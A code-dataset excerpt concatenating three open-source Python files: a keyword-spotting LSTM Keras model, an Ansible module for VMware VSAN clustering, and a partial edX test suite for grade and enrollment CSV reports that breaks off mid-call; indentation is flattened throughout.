# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LSTM with Mel spectrum and fully connected layers."""
from kws_streaming.layers import lstm
from kws_streaming.layers import modes
from kws_streaming.layers import speech_features
from kws_streaming.layers import stream
from kws_streaming.layers.compat import tf
import kws_streaming.models.model_utils as utils
def model_parameters(parser_nn):
"""LSTM model parameters."""
parser_nn.add_argument(
'--lstm_units',
type=str,
default='500',
help='Output space dimensionality of lstm layer ',
)
parser_nn.add_argument(
'--return_sequences',
type=str,
default='0',
help='Whether to return the last output in the output sequence,'
'or the full sequence',
)
parser_nn.add_argument(
'--stateful',
type=int,
default='1',
help='If True, the last state for each sample at index i'
'in a batch will be used as initial state for the sample '
'of index i in the following batch',
)
parser_nn.add_argument(
'--num_proj',
type=str,
default='200',
help='The output dimensionality for the projection matrices.',
)
parser_nn.add_argument(
'--use_peepholes',
type=int,
default='1',
help='True to enable diagonal/peephole connections',
)
parser_nn.add_argument(
'--dropout1',
type=float,
default=0.3,
help='Percentage of data dropped',
)
parser_nn.add_argument(
'--units1',
type=str,
default='',
help='Number of units in the last set of hidden layers',
)
parser_nn.add_argument(
'--act1',
type=str,
default='',
help='Activation function of the last set of hidden layers',
)
def model(flags):
"""LSTM model.
Similar model in papers:
Convolutional Recurrent Neural Networks for Small-Footprint Keyword Spotting
https://arxiv.org/pdf/1703.05390.pdf (with no conv layer)
Model topology is similar with "Hello Edge: Keyword Spotting on
Microcontrollers" https://arxiv.org/pdf/1711.07128.pdf
Args:
flags: data/model parameters
Returns:
Keras model for training
"""
input_audio = tf.keras.layers.Input(
shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),
batch_size=flags.batch_size)
net = input_audio
if flags.preprocess == 'raw':
# it is a self contained model, user need to feed raw audio only
net = speech_features.SpeechFeatures(
speech_features.SpeechFeatures.get_params(flags))(
net)
for units, return_sequences, num_proj in zip(
utils.parse(flags.lstm_units), utils.parse(flags.return_sequences),
utils.parse(flags.num_proj)):
net = lstm.LSTM(
units=units,
return_sequences=return_sequences,
stateful=flags.stateful,
use_peepholes=flags.use_peepholes,
num_proj=num_proj)(
net)
net = stream.Stream(cell=tf.keras.layers.Flatten())(net)
net = tf.keras.layers.Dropout(rate=flags.dropout1)(net)
for units, activation in zip(
utils.parse(flags.units1), utils.parse(flags.act1)):
net = tf.keras.layers.Dense(units=units, activation=activation)(net)
net = tf.keras.layers.Dense(units=flags.label_count)(net)
if flags.return_softmax:
net = tf.keras.layers.Activation('softmax')(net)
return tf.keras.Model(input_audio, net)
| apache-2.0 |
alikins/ansible | lib/ansible/modules/cloud/vmware/vmware_vsan_cluster.py | 47 | 3753 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Russell Teague <rteague2 () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_vsan_cluster
short_description: Configure VSAN clustering on an ESXi host
description:
- This module can be used to configure VSAN clustering on an ESXi host
version_added: 2.0
author: "Russell Teague (@mtnbikenc)"
notes:
- Tested on vSphere 5.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
cluster_uuid:
description:
- Desired cluster UUID
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
# Example command from Ansible Playbook
- name: Configure VMware VSAN Cluster
hosts: deploy_node
gather_facts: False
tags:
- vsan
tasks:
- name: Configure VSAN on first host
vmware_vsan_cluster:
hostname: "{{ groups['esxi'][0] }}"
username: "{{ esxi_username }}"
password: "{{ site_password }}"
register: vsan_cluster
- name: Configure VSAN on remaining hosts
vmware_vsan_cluster:
hostname: "{{ item }}"
username: "{{ esxi_username }}"
password: "{{ site_password }}"
cluster_uuid: "{{ vsan_cluster.cluster_uuid }}"
with_items: "{{ groups['esxi'][1:] }}"
'''
try:
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (HAS_PYVMOMI, connect_to_api, get_all_objs, vmware_argument_spec,
wait_for_task)
def create_vsan_cluster(host_system, new_cluster_uuid):
host_config_manager = host_system.configManager
vsan_system = host_config_manager.vsanSystem
vsan_config = vim.vsan.host.ConfigInfo()
vsan_config.enabled = True
if new_cluster_uuid is not None:
vsan_config.clusterInfo = vim.vsan.host.ConfigInfo.ClusterInfo()
vsan_config.clusterInfo.uuid = new_cluster_uuid
vsan_config.storageInfo = vim.vsan.host.ConfigInfo.StorageInfo()
vsan_config.storageInfo.autoClaimStorage = True
task = vsan_system.UpdateVsan_Task(vsan_config)
changed, result = wait_for_task(task)
host_status = vsan_system.QueryHostStatus()
cluster_uuid = host_status.uuid
return changed, result, cluster_uuid
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(dict(cluster_uuid=dict(required=False, type='str')))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_PYVMOMI:
module.fail_json(msg='pyvmomi is required for this module')
new_cluster_uuid = module.params['cluster_uuid']
try:
content = connect_to_api(module, False)
host = get_all_objs(content, [vim.HostSystem])
if not host:
module.fail_json(msg="Unable to locate Physical Host.")
host_system = host.keys()[0]
changed, result, cluster_uuid = create_vsan_cluster(host_system, new_cluster_uuid)
module.exit_json(changed=changed, result=result, cluster_uuid=cluster_uuid)
except vmodl.RuntimeFault as runtime_fault:
module.fail_json(msg=runtime_fault.msg)
except vmodl.MethodFault as method_fault:
module.fail_json(msg=method_fault.msg)
except Exception as e:
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 |
knehez/edx-platform | lms/djangoapps/instructor_task/tests/test_tasks_helper.py | 13 | 57777 | # -*- coding: utf-8 -*-
"""
Unit tests for LMS instructor-initiated background tasks helper functions.
Tests that CSV grade report generation works with unicode emails.
"""
import ddt
from mock import Mock, patch
import tempfile
import unicodecsv
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from capa.tests.response_xml_factory import MultipleChoiceResponseXMLFactory
from certificates.models import CertificateStatuses
from certificates.tests.factories import GeneratedCertificateFactory, CertificateWhitelistFactory
from course_modes.models import CourseMode
from courseware.tests.factories import InstructorFactory
from instructor_task.tests.test_base import InstructorTaskCourseTestCase, TestReportMixin, InstructorTaskModuleTestCase
from openedx.core.djangoapps.course_groups.models import CourseUserGroupPartitionGroup
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory
import openedx.core.djangoapps.user_api.course_tag.api as course_tag_api
from openedx.core.djangoapps.user_api.partition_schemes import RandomUserPartitionScheme
from shoppingcart.models import Order, PaidCourseRegistration, CourseRegistrationCode, Invoice, \
CourseRegistrationCodeInvoiceItem, InvoiceTransaction, Coupon
from student.tests.factories import UserFactory, CourseModeFactory
from student.models import CourseEnrollment, CourseEnrollmentAllowed, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED
from verify_student.tests.factories import SoftwareSecurePhotoVerificationFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.partitions.partitions import Group, UserPartition
from instructor_task.models import ReportStore
from instructor_task.tasks_helper import (
cohort_students_and_upload,
upload_grades_csv,
upload_problem_grade_report,
upload_students_csv,
upload_may_enroll_csv,
upload_enrollment_report,
upload_exec_summary_report,
generate_students_certificates,
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase, TestConditionalContent
@ddt.ddt
class TestInstructorGradeReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV grade report generation works.
"""
def setUp(self):
super(TestInstructorGradeReport, self).setUp()
self.course = CourseFactory.create()
@ddt.data([u'student@example.com', u'ni\xf1o@example.com'])
def test_unicode_emails(self, emails):
"""
Test that students with unicode characters in emails is handled.
"""
for i, email in enumerate(emails):
self.create_student('student{0}'.format(i), email)
self.current_task = Mock()
self.current_task.update_state = Mock()
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
num_students = len(emails)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
@patch('instructor_task.tasks_helper._get_current_task')
@patch('instructor_task.tasks_helper.iterate_grades_for')
def test_grading_failure(self, mock_iterate_grades_for, _mock_current_task):
"""
Test that any grading errors are properly reported in the
progress dict and uploaded to the report store.
"""
# mock an error response from `iterate_grades_for`
mock_iterate_grades_for.return_value = [
(self.create_student('username', 'student@example.com'), {}, 'Cannot grade student')
]
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))
def _verify_cell_data_for_user(self, username, course_id, column_header, expected_cell_content):
"""
Verify cell data in the grades CSV for a particular user.
"""
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_grades_csv(None, None, course_id, None, 'graded')
self.assertDictContainsSubset({'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
report_csv_filename = report_store.links_for(course_id)[0][0]
with open(report_store.path_to(course_id, report_csv_filename)) as csv_file:
for row in unicodecsv.DictReader(csv_file):
if row.get('username') == username:
self.assertEqual(row[column_header], expected_cell_content)
def test_cohort_data_in_grading(self):
"""
Test that cohort data is included in grades csv if cohort configuration is enabled for course.
"""
cohort_groups = ['cohort 1', 'cohort 2']
course = CourseFactory.create(cohort_config={'cohorted': True, 'auto_cohort': True,
'auto_cohort_groups': cohort_groups})
user_1 = 'user_1'
user_2 = 'user_2'
CourseEnrollment.enroll(UserFactory.create(username=user_1), course.id)
CourseEnrollment.enroll(UserFactory.create(username=user_2), course.id)
# In auto cohorting a group will be assigned to a user only when user visits a problem
# In grading calculation we only add a group in csv if group is already assigned to
# user rather than creating a group automatically at runtime
self._verify_cell_data_for_user(user_1, course.id, 'Cohort Name', '')
self._verify_cell_data_for_user(user_2, course.id, 'Cohort Name', '')
def test_unicode_cohort_data_in_grading(self):
"""
Test that cohorts can contain unicode characters.
"""
course = CourseFactory.create(cohort_config={'cohorted': True})
# Create users and manually assign cohorts
user1 = UserFactory.create(username='user1')
user2 = UserFactory.create(username='user2')
CourseEnrollment.enroll(user1, course.id)
CourseEnrollment.enroll(user2, course.id)
professor_x = u'ÞrÖfessÖr X'
magneto = u'MàgnëtÖ'
cohort1 = CohortFactory(course_id=course.id, name=professor_x)
cohort2 = CohortFactory(course_id=course.id, name=magneto)
cohort1.users.add(user1)
cohort2.users.add(user2)
self._verify_cell_data_for_user(user1.username, course.id, 'Cohort Name', professor_x)
self._verify_cell_data_for_user(user2.username, course.id, 'Cohort Name', magneto)
def test_unicode_user_partitions(self):
"""
Test that user partition groups can contain unicode characters.
"""
user_groups = [u'ÞrÖfessÖr X', u'MàgnëtÖ']
user_partition = UserPartition(
0,
'x_man',
'X Man',
[
Group(0, user_groups[0]),
Group(1, user_groups[1])
]
)
# Create course with group configurations
self.initialize_course(
course_factory_kwargs={
'user_partitions': [user_partition]
}
)
_groups = [group.name for group in self.course.user_partitions[0].groups]
self.assertEqual(_groups, user_groups)
def test_cohort_scheme_partition(self):
"""
Test that cohort-schemed user partitions are ignored in the
grades export.
"""
# Set up a course with 'cohort' and 'random' user partitions.
cohort_scheme_partition = UserPartition(
0,
'Cohort-schemed Group Configuration',
'Group Configuration based on Cohorts',
[Group(0, 'Group A'), Group(1, 'Group B')],
scheme_id='cohort'
)
experiment_group_a = Group(2, u'Expériment Group A')
experiment_group_b = Group(3, u'Expériment Group B')
experiment_partition = UserPartition(
1,
u'Content Expériment Configuration',
u'Group Configuration for Content Expériments',
[experiment_group_a, experiment_group_b],
scheme_id='random'
)
course = CourseFactory.create(
cohort_config={'cohorted': True},
user_partitions=[cohort_scheme_partition, experiment_partition]
)
# Create user_a and user_b which are enrolled in the course
# and assigned to experiment_group_a and experiment_group_b,
# respectively.
user_a = UserFactory.create(username='user_a')
user_b = UserFactory.create(username='user_b')
CourseEnrollment.enroll(user_a, course.id)
CourseEnrollment.enroll(user_b, course.id)
course_tag_api.set_course_tag(
user_a,
course.id,
RandomUserPartitionScheme.key_for_partition(experiment_partition),
experiment_group_a.id
)
course_tag_api.set_course_tag(
user_b,
course.id,
RandomUserPartitionScheme.key_for_partition(experiment_partition),
experiment_group_b.id
)
# Assign user_a to a group in the 'cohort'-schemed user
# partition (by way of a cohort) to verify that the user
# partition group does not show up in the "Experiment Group"
# cell.
cohort_a = CohortFactory.create(course_id=course.id, name=u'Cohørt A', users=[user_a])
CourseUserGroupPartitionGroup(
course_user_group=cohort_a,
partition_id=cohort_scheme_partition.id,
group_id=cohort_scheme_partition.groups[0].id
).save()
# Verify that we see user_a and user_b in their respective
# content experiment groups, and that we do not see any
# content groups.
experiment_group_message = u'Experiment Group ({content_experiment})'
self._verify_cell_data_for_user(
user_a.username,
course.id,
experiment_group_message.format(
content_experiment=experiment_partition.name
),
experiment_group_a.name
)
self._verify_cell_data_for_user(
user_b.username,
course.id,
experiment_group_message.format(
content_experiment=experiment_partition.name
),
experiment_group_b.name
)
# Make sure cohort info is correct.
cohort_name_header = 'Cohort Name'
self._verify_cell_data_for_user(
user_a.username,
course.id,
cohort_name_header,
cohort_a.name
)
self._verify_cell_data_for_user(
user_b.username,
course.id,
cohort_name_header,
''
)
@patch('instructor_task.tasks_helper._get_current_task')
@patch('instructor_task.tasks_helper.iterate_grades_for')
def test_unicode_in_csv_header(self, mock_iterate_grades_for, _mock_current_task):
"""
Tests that CSV grade report works if unicode in headers.
"""
# mock a response from `iterate_grades_for`
mock_iterate_grades_for.return_value = [
(
self.create_student('username', 'student@example.com'),
{'section_breakdown': [{'label': u'\u8282\u540e\u9898 01'}], 'percent': 0, 'grade': None},
'Cannot grade student'
)
]
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
@ddt.ddt
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_PAID_COURSE_REGISTRATION': True})
class TestInstructorDetailedEnrollmentReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV detailed enrollment generation works.
"""
def setUp(self):
super(TestInstructorDetailedEnrollmentReport, self).setUp()
self.course = CourseFactory.create()
# create testing invoice 1
self.instructor = InstructorFactory(course_key=self.course.id)
self.sale_invoice_1 = Invoice.objects.create(
total_amount=1234.32, company_name='Test1', company_contact_name='TestName',
company_contact_email='Test@company.com',
recipient_name='Testw', recipient_email='test1@test.com', customer_reference_number='2Fwe23S',
internal_reference="A", course_id=self.course.id, is_valid=True
)
self.invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
invoice=self.sale_invoice_1,
qty=1,
unit_price=1234.32,
course_id=self.course.id
)
def test_success(self):
self.create_student('student', 'student@example.com')
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
def test_student_paid_course_enrollment_report(self):
"""
test to check the paid user enrollment csv report status
and enrollment source.
"""
student = UserFactory()
student_cart = Order.get_cart_for_user(student)
PaidCourseRegistration.add_to_order(student_cart, self.course.id)
student_cart.purchase()
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Credit Card - Individual')
self._verify_cell_data_in_csv(student.username, 'Payment Status', 'purchased')
def test_student_manually_enrolled_in_detailed_enrollment_source(self):
"""
test to check the manually enrolled user enrollment report status
and enrollment source.
"""
student = UserFactory()
enrollment = CourseEnrollment.enroll(student, self.course.id)
ManualEnrollmentAudit.create_manual_enrollment_audit(
self.instructor, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
'manually enrolling unenrolled user', enrollment
)
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
enrollment_source = u'manually enrolled by user_id {user_id}, enrollment state transition: {transition}'.format(
user_id=self.instructor.id, transition=ALLOWEDTOENROLL_TO_ENROLLED) # pylint: disable=no-member
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_cell_data_in_csv(student.username, 'Enrollment Source', enrollment_source)
self._verify_cell_data_in_csv(student.username, 'Payment Status', 'TBD')
def test_student_used_enrollment_code_for_course_enrollment(self):
"""
test to check the user enrollment source and payment status in the
enrollment detailed report
"""
student = UserFactory()
self.client.login(username=student.username, password='test')
student_cart = Order.get_cart_for_user(student)
paid_course_reg_item = PaidCourseRegistration.add_to_order(student_cart, self.course.id)
# update the quantity of the cart item paid_course_reg_item
resp = self.client.post(reverse('shoppingcart.views.update_user_cart'),
{'ItemId': paid_course_reg_item.id, 'qty': '4'})
self.assertEqual(resp.status_code, 200)
student_cart.purchase()
course_reg_codes = CourseRegistrationCode.objects.filter(order=student_cart)
redeem_url = reverse('register_code_redemption', args=[course_reg_codes[0].code])
response = self.client.get(redeem_url)
self.assertEquals(response.status_code, 200)
# check button text
self.assertTrue('Activate Course Enrollment' in response.content)
response = self.client.post(redeem_url)
self.assertEquals(response.status_code, 200)
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
self._verify_cell_data_in_csv(student.username, 'Payment Status', 'purchased')
def test_student_used_invoice_unpaid_enrollment_code_for_course_enrollment(self):
"""
test to check the user enrollment source and payment status in the
enrollment detailed report
"""
student = UserFactory()
self.client.login(username=student.username, password='test')
course_registration_code = CourseRegistrationCode(
code='abcde',
course_id=self.course.id.to_deprecated_string(),
created_by=self.instructor,
invoice=self.sale_invoice_1,
invoice_item=self.invoice_item,
mode_slug='honor'
)
course_registration_code.save()
redeem_url = reverse('register_code_redemption', args=['abcde'])
response = self.client.get(redeem_url)
self.assertEquals(response.status_code, 200)
# check button text
self.assertTrue('Activate Course Enrollment' in response.content)
response = self.client.post(redeem_url)
self.assertEquals(response.status_code, 200)
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
self._verify_cell_data_in_csv(student.username, 'Payment Status', 'Invoice Outstanding')
def test_student_used_invoice_paid_enrollment_code_for_course_enrollment(self):
"""
test to check the user enrollment source and payment status in the
enrollment detailed report
"""
student = UserFactory()
self.client.login(username=student.username, password='test')
invoice_transaction = InvoiceTransaction(
invoice=self.sale_invoice_1,
amount=self.sale_invoice_1.total_amount,
status='completed',
created_by=self.instructor,
last_modified_by=self.instructor
)
invoice_transaction.save()
course_registration_code = CourseRegistrationCode(
code='abcde',
course_id=self.course.id.to_deprecated_string(),
created_by=self.instructor,
invoice=self.sale_invoice_1,
invoice_item=self.invoice_item,
mode_slug='honor'
)
course_registration_code.save()
redeem_url = reverse('register_code_redemption', args=['abcde'])
response = self.client.get(redeem_url)
self.assertEquals(response.status_code, 200)
# check button text
self.assertTrue('Activate Course Enrollment' in response.content)
response = self.client.post(redeem_url)
self.assertEquals(response.status_code, 200)
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
self._verify_cell_data_in_csv(student.username, 'Payment Status', 'Invoice Paid')
def _verify_cell_data_in_csv(self, username, column_header, expected_cell_content):
"""
Verify that the last ReportStore CSV contains the expected content.
"""
report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
report_csv_filename = report_store.links_for(self.course.id)[0][0]
with open(report_store.path_to(self.course.id, report_csv_filename)) as csv_file:
# Expand the dict reader generator so we don't lose it's content
for row in unicodecsv.DictReader(csv_file):
if row.get('Username') == username:
self.assertEqual(row[column_header], expected_cell_content)
@ddt.ddt
class TestProblemGradeReport(TestReportMixin, InstructorTaskModuleTestCase):
"""
Test that the problem CSV generation works.
"""
def setUp(self):
super(TestProblemGradeReport, self).setUp()
self.initialize_course()
# Add unicode data to CSV even though unicode usernames aren't
# technically possible in openedx.
self.student_1 = self.create_student(u'üser_1')
self.student_2 = self.create_student(u'üser_2')
self.csv_header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']
@patch('instructor_task.tasks_helper._get_current_task')
def test_no_problems(self, _get_current_task):
"""
Verify that we see no grade information for a course with no graded
problems.
"""
result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv([
dict(zip(
self.csv_header_row,
[unicode(self.student_1.id), self.student_1.email, self.student_1.username, '0.0']
)),
dict(zip(
self.csv_header_row,
[unicode(self.student_2.id), self.student_2.email, self.student_2.username, '0.0']
))
])
@patch('instructor_task.tasks_helper._get_current_task')
def test_single_problem(self, _get_current_task):
vertical = ItemFactory.create(
parent_location=self.problem_section.location,
category='vertical',
metadata={'graded': True},
display_name='Problem Vertical'
)
self.define_option_problem(u'Pröblem1', parent=vertical)
self.submit_student_answer(self.student_1.username, u'Pröblem1', ['Option 1'])
result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
problem_name = u'Homework 1: Problem - Pröblem1'
header_row = self.csv_header_row + [problem_name + ' (Earned)', problem_name + ' (Possible)']
self.verify_rows_in_csv([
dict(zip(
header_row,
[
unicode(self.student_1.id),
self.student_1.email,
self.student_1.username,
'0.01', '1.0', '2.0']
)),
dict(zip(
header_row,
[
unicode(self.student_2.id),
self.student_2.email,
self.student_2.username,
'0.0', 'N/A', 'N/A'
]
))
])
@patch('instructor_task.tasks_helper._get_current_task')
@patch('instructor_task.tasks_helper.iterate_grades_for')
@ddt.data(u'Cannöt grade student', '')
def test_grading_failure(self, error_message, mock_iterate_grades_for, _mock_current_task):
"""
Test that any grading errors are properly reported in the progress
dict and uploaded to the report store.
"""
# mock an error response from `iterate_grades_for`
student = self.create_student(u'username', u'student@example.com')
mock_iterate_grades_for.return_value = [
(student, {}, error_message)
]
result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))
self.verify_rows_in_csv([
{
u'Student ID': unicode(student.id),
u'Email': student.email,
u'Username': student.username,
u'error_msg': error_message if error_message else "Unknown error"
}
])
class TestProblemReportSplitTestContent(TestReportMixin, TestConditionalContent, InstructorTaskModuleTestCase):
"""
Test the problem report on a course that has split tests.
"""
OPTION_1 = 'Option 1'
OPTION_2 = 'Option 2'
def setUp(self):
super(TestProblemReportSplitTestContent, self).setUp()
self.problem_a_url = u'pröblem_a_url'
self.problem_b_url = u'pröblem_b_url'
self.define_option_problem(self.problem_a_url, parent=self.vertical_a)
self.define_option_problem(self.problem_b_url, parent=self.vertical_b)
def test_problem_grade_report(self):
"""
Test that we generate the correct the correct grade report when dealing with A/B tests.
In order to verify that the behavior of the grade report is correct, we submit answers for problems
that the student won't have access to. A/B tests won't restrict access to the problems, but it should
not show up in that student's course tree when generating the grade report, hence the N/A's in the grade report.
"""
# student A will get 100%, student B will get 50% because
# OPTION_1 is the correct option, and OPTION_2 is the
# incorrect option
self.submit_student_answer(self.student_a.username, self.problem_a_url, [self.OPTION_1, self.OPTION_1])
self.submit_student_answer(self.student_a.username, self.problem_b_url, [self.OPTION_1, self.OPTION_1])
self.submit_student_answer(self.student_b.username, self.problem_a_url, [self.OPTION_1, self.OPTION_2])
self.submit_student_answer(self.student_b.username, self.problem_b_url, [self.OPTION_1, self.OPTION_2])
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset(
{'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result
)
problem_names = [u'Homework 1: Problem - pröblem_a_url', u'Homework 1: Problem - pröblem_b_url']
header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']
for problem in problem_names:
header_row += [problem + ' (Earned)', problem + ' (Possible)']
self.verify_rows_in_csv([
dict(zip(
header_row,
[
unicode(self.student_a.id),
self.student_a.email,
self.student_a.username,
u'1.0', u'2.0', u'2.0', u'N/A', u'N/A'
]
)),
dict(zip(
header_row,
[
unicode(self.student_b.id),
self.student_b.email,
self.student_b.username, u'0.5', u'N/A', u'N/A', u'1.0', u'2.0'
]
))
])
class TestProblemReportCohortedContent(TestReportMixin, ContentGroupTestCase, InstructorTaskModuleTestCase):
"""
Test the problem report on a course that has cohorted content.
"""
def setUp(self):
super(TestProblemReportCohortedContent, self).setUp()
# contstruct cohorted problems to work on.
self.add_course_content()
vertical = ItemFactory.create(
parent_location=self.problem_section.location,
category='vertical',
metadata={'graded': True},
display_name='Problem Vertical'
)
self.define_option_problem(
u"Pröblem0",
parent=vertical,
group_access={self.course.user_partitions[0].id: [self.course.user_partitions[0].groups[0].id]}
)
self.define_option_problem(
u"Pröblem1",
parent=vertical,
group_access={self.course.user_partitions[0].id: [self.course.user_partitions[0].groups[1].id]}
)
def test_cohort_content(self):
self.submit_student_answer(self.alpha_user.username, u'Pröblem0', ['Option 1', 'Option 1'])
resp = self.submit_student_answer(self.alpha_user.username, u'Pröblem1', ['Option 1', 'Option 1'])
self.assertEqual(resp.status_code, 404)
resp = self.submit_student_answer(self.beta_user.username, u'Pröblem0', ['Option 1', 'Option 2'])
self.assertEqual(resp.status_code, 404)
self.submit_student_answer(self.beta_user.username, u'Pröblem1', ['Option 1', 'Option 2'])
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset(
{'action_name': 'graded', 'attempted': 4, 'succeeded': 4, 'failed': 0}, result
)
problem_names = [u'Homework 1: Problem - Pröblem0', u'Homework 1: Problem - Pröblem1']
header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']
for problem in problem_names:
header_row += [problem + ' (Earned)', problem + ' (Possible)']
self.verify_rows_in_csv([
dict(zip(
header_row,
[
unicode(self.staff_user.id),
self.staff_user.email,
self.staff_user.username, u'0.0', u'N/A', u'N/A', u'N/A', u'N/A'
]
)),
dict(zip(
header_row,
[
unicode(self.alpha_user.id),
self.alpha_user.email,
self.alpha_user.username,
u'1.0', u'2.0', u'2.0', u'N/A', u'N/A'
]
)),
dict(zip(
header_row,
[
unicode(self.beta_user.id),
self.beta_user.email,
self.beta_user.username,
u'0.5', u'N/A', u'N/A', u'1.0', u'2.0'
]
)),
dict(zip(
header_row,
[
unicode(self.non_cohorted_user.id),
self.non_cohorted_user.email,
self.non_cohorted_user.username,
u'0.0', u'N/A', u'N/A', u'N/A', u'N/A'
]
)),
])
@ddt.ddt
class TestExecutiveSummaryReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that Executive Summary report generation works.
"""
def setUp(self):
super(TestExecutiveSummaryReport, self).setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, min_price=50)
self.instructor = InstructorFactory(course_key=self.course.id)
self.student1 = UserFactory()
self.student2 = UserFactory()
self.student1_cart = Order.get_cart_for_user(self.student1)
self.student2_cart = Order.get_cart_for_user(self.student2)
self.sale_invoice_1 = Invoice.objects.create(
total_amount=1234.32, company_name='Test1', company_contact_name='TestName',
company_contact_email='Test@company.com',
recipient_name='Testw', recipient_email='test1@test.com', customer_reference_number='2Fwe23S',
internal_reference="A", course_id=self.course.id, is_valid=True
)
InvoiceTransaction.objects.create(
invoice=self.sale_invoice_1,
amount=self.sale_invoice_1.total_amount,
status='completed',
created_by=self.instructor,
last_modified_by=self.instructor
)
self.invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
invoice=self.sale_invoice_1,
qty=10,
unit_price=1234.32,
course_id=self.course.id
)
for i in range(5):
coupon = Coupon(
code='coupon{0}'.format(i), description='test_description', course_id=self.course.id,
percentage_discount='{0}'.format(i), created_by=self.instructor, is_active=True,
)
coupon.save()
def test_successfully_generate_executive_summary_report(self):
"""
Test that successfully generates the executive summary report.
"""
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_exec_summary_report(
None, None, self.course.id,
